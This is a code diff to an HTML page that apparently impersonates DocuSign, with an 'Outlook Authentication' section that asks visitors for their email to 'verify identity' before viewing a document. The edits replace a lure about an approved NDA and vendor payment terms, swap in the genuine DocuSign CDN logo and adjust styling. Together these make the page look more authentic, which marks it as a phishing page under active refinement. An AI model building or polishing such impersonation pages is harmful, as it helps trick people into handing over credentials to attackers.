--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <link rel="icon" type="image/svg" href="https://upload.wikimedia.org/wikipedia/commons/3/34/DocuSign_logo.png">
+    <link rel="icon" type="image/svg" href="https://docucdn-a.akamaihd.net/olive/images/2.65.0/global-assets/ds-logo-default.svg">
     <title>DocuSign</title>
     <style>
         body { 
@@ -28,7 +28,7 @@
         }
         input, button { padding: 10px; margin-top: 10px; }
         input { width: 280px; border: 1px solid #ccc; border-radius: 5px; }
-        button { background-color: #00A3EE; color: white; border: none; cursor: pointer; border-radius: 5px; }
+        button { background-color: #FFDF00; color: white; border: none; cursor: pointer; border-radius: 5px; }
         footer { 
             background: #f4f4f4; /* Footer matches the email form background */
             color: black; 
@@ -69,9 +69,9 @@
 
     <!-- Outlook Authentication Page -->
     <div id="auth-page" class="container">
-        <img src="https://upload.wikimedia.org/wikipedia/commons/3/34/DocuSign_logo.png" alt="Outlook Logo" class="logo"><br>
-        
-        <p><b>Approved: Completed Non-Disclosure Agreement & MOU Vendor#30862911 Payment_terms.pdf</b></p><br><br>
+        <img src="https://docucdn-a.akamaihd.net/olive/images/2.65.0/global-assets/ds-logo-default.svg" alt="Outlook Logo" class="logo"><br>
+        <h1>Email Authentication</h1>
+        <p>To access this document, you will need to verify your identity.</p><br><br>
         <input type="email" id="email" placeholder="Enter the recipient's email to view document"> </br></br>
         <button onclick="validateEmail()">REVIEW DOCUMENT HERE</button>
     </div>
